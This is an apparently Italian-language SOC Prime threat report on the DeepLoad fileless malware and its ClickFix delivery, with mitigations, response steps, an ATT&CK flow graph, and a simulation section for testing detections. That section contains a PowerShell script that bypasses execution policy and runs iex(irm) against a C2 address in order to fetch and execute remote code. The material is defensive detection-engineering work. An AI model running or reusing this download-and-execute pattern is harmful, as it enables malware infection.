SOC Prime Bias: Medio

07 Apr 2026 18:16
newspaper icon ReliaQuest

Malware DeepLoad abbina la consegna ClickFix con l’elusione generata dall’AI

Author Photo
Ruslan Mikhalov Capo della Ricerca sulle Minacce presso SOC Prime linkedin icon Segui
Malware DeepLoad abbina la consegna ClickFix con l’elusione generata dall’AI
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Riassunto

DeepLoad è una famiglia di malware senza file distribuita tramite l’ingegneria sociale di ClickFix. Si basa su un loader PowerShell offuscato, iniezione di shellcode in memoria in processi affidabili di Windows e “rumore” generato da IA per ridurre la precisione del rilevamento statico. Il loader stabilisce la persistenza utilizzando un’attività pianificata e sottoscrizioni di eventi WMI, può propagarsi tramite supporti USB e ruba credenziali attraverso sia un’estensione del browser canaglia che un componente companion filemanager.exe.

Indagine

Il rapporto descrive l’accesso iniziale a partire da un comando PowerShell eseguito dalla vittima, seguito dal recupero del loader tramite mshta.exe. Il loader utilizza Add-Type per generare una DLL temporanea a runtime, quindi inietta lo shellcode in LockAppHost.exe usando l’iniezione basata su APC. La persistenza è mantenuta attraverso un’attività pianificata e una sottoscrizione di eventi WMI nascosta in grado di ristabilire l’infezione anche dopo la pulizia, con una finestra di ritardo approssimativa di tre giorni. Il furto di credenziali è attribuito a filemanager.exe insieme ad un’estensione del browser malevola che opera in parallelo.

Mitigazione

Abilita Log dei Blocchi Script PowerShell e allerta su catene di esecuzione PowerShell sospette. Verifica l’attività di rete in uscita di mshta.exe, monitora la creazione inaspettata di attività pianificate e rileva l’uso anomalo di QueueUserAPC indicativo di iniezione APC. Durante la bonifica, elenca ed elimina esplicitamente le sottoscrizioni di eventi WMI piuttosto che affidarti solo sulla pulizia dei file/registro. Ruota le credenziali esposte e rimuovi eventuali estensioni del browser non autorizzate per interrompere i percorsi di raccolta credenziali.

Risposta

Se viene rilevata un’attività di DeepLoad, isola l’host, interrompi l’attività malevola di PowerShell e termina tutti i processi iniettati. Rimuovi l’attività pianificata ed elimina la sottoscrizione WMI associata, quindi eradica filemanager.exe e l’estensione del browser malevola. Ruota tutte le credenziali potenzialmente compromesse, sanitizza qualsiasi supporto USB collegato e verifica il sistema per artefatti di iniezione residua prima di rimetterlo in servizio.

Parole chiave: DeepLoad, ClickFix, malware senza file, loader PowerShell, mshta.exe, Add-Type, shellcode in memoria, iniezione APC, QueueUserAPC, LockAppHost.exe, persistenza di attività pianificate, sottoscrizione di eventi WMI, propagazione USB, estensione del browser malevola, furto di credenziali.

"graph TB %% Class definitions classDef action fill:#99ccff %% Node definitions step_user_exec["<b>Azione</b> – <b>T1204.004 Esecuzione Utente: Copia e Incolla Maliziosa</b><br/>La vittima esegue un comando PowerShell tramite ClickFix."] class step_user_exec action step_powershell["<b>Azione</b> – <b>T1059.001 Interprete Comandi e Script: PowerShell</b><br/>Scarica il loader usando Invokeu2011Expression (IEX)."] class step_powershell action step_mshta["<b>Azione</b> – <b>T1218.005 Esecuzione Proxy Binario di Sistema: Mshta</b><br/>mshta.exe recupera script remoto."] class step_mshta action step_schtask["<b>Azione</b> – <b>T1053 Attività Pianificata/Job</b><br/>Crea task di persistenza per rieseguire il loader."] class step_schtask action step_injection["<b>Azione</b> – <b>T1055.004 Iniezione di Processo: Chiamata di Procedura Asincrona</b><br/>Inietta shellcode in LockAppHost.exe."] class step_injection action step_reflective["<b>Azione</b> – <b>T1620 Caricamento di Codice Riflettivo</b><br/>Compila DLL in memoria tramite Addu2011Type."] class step_reflective action step_masquerade["<b>Azione</b> – <b>T1036.003 Mascheramento: Rinomina Utilità Legittime</b><br/>Usa filemanager.exe e scorciatoie .lnk."] class step_masquerade action step_removable["<b>Azione</b> – <b>T1091 Replicazione Tramite Media Rimovibili / T1080 Contaminazione di Contenuti Condivisi</b><br/>Rilascia scorciatoie malevole in unità USB."] class step_removable action step_wmi["<b>Azione</b> – <b>T1546.003 Esecuzione Attivata da Evento: Sottoscrizione Evento WMI</b><br/>Persiste e riesegue dopo la pulizia."] class step_wmi action step_keylog["<b>Azione</b> – <b>T1056.001 Cattura di Input: Keylogging</b><br/>Cattura le battute per le credenziali."] class step_keylog action step_cred["<b>Azione</b> – <b>T1555.003 Credenziali dai Browser Web / T1176 Estensioni Software</b><br/>Estensione del browser malevola ruba password archiviate."] class step_cred action step_valid["<b>Azione</b> – <b>T1078 Account Valid</b><br/>L’attaccante usa credenziali raccolte."] class step_valid action step_c2["<b>Azione</b> – <b>T1102.002 Comunicazione Bidirezionale di Servizio Web / T1102.003 Unidirezionale</b><br/>Canale C2 ed esfiltrazione."] class step_c2 action %% Connections step_user_exec –>|attiva| step_powershell step_powershell –>|scarica tramite| step_mshta step_mshta –>|esegue| step_schtask step_schtask –>|crea| step_injection step_injection –>|inietta in| step_reflective step_reflective –>|carica| step_masquerade step_masquerade –>|piazza scorciatoie su| step_removable step_removable –>|abilita| step_wmi step_wmi –>|attiva| step_keylog step_keylog –>|cattura credenziali per| step_cred step_cred –>|fornisce| step_valid step_valid –>| facilita | step_c2 "

Flusso di attacco

Esecuzione di Simulazione

Prerequisito: Il Controllo di Prevolo Telemetria & Baseline deve essere passato.

Razionale: Questa sezione descrive l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTPs identificate e mirare a generare esattamente la telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narra tivo dell’Attacco & Comandi:

    1. Accesso iniziale: L’attaccante ha una sessione PowerShell a basso privilegio sull’host della vittima.
    2. Ignora politica di esecuzione: Invocano PowerShell con -ep Bypass per ignorare qualsiasi restrizione di esecuzione script.
    3. Compila un payload .NET: Usando Add-Type, integrano una piccola classe C# che, quando istanziata, esegue una richiesta web al server di C2 (http://10.0.0.5:3015/index).
    4. Scarica & esegui script remoto: L’attaccante dirige il risultato di irm (Invoke‑RestMethod) in iex, eseguendo lo script malevolo in memoria.
    5. Telemetria risultante: La riga di comando registrata dal SO contiene le tre stringhe richieste (-ep Bypass, Add-Type, iex(irm http://…:3015/index)), soddisfacendo la regola Sigma.

  • Script di Test di Regressione:

    # Esecuzione malevola tipo DeepLoad
# Questo script riproduce esattamente il modello di comando richiesto per attivare la regola Sigma.
$c2 = "http://10.0.0.5:3015/index"
$payload = @"
using System;
using System.Net;
public class Loader {
public static void Run() {
    new WebClient().DownloadString(""$c2"");
}
}
"@
# Invoca PowerShell con il flag di bypass, compila il payload, quindi esegui lo script remoto
powershell -NoProfile -ExecutionPolicy Bypass -Command `
    "Add-Type -TypeDefinition `$payload; `
     iex (irm $c2)"

  • Comandi di Pulizia:

    # Rimuovi eventuali file temporanei o assembly caricati (se persistiti)
Remove-Item -Path "$env:TEMPloader.dll" -ErrorAction SilentlyContinue
# Facoltativamente, cancella la trascrizione di PowerShell (se abilitato)
Clear-Host

Fine del Rapporto

Unisciti alla piattaforma Detection as Code di SOC Prime per migliorare la visibilità sulle minacce più rilevanti per il tuo business. Per aiutarti a iniziare e aumentare immediatamente il valore, prenota ora un incontro con gli esperti di SOC Prime.

Iscriviti gratis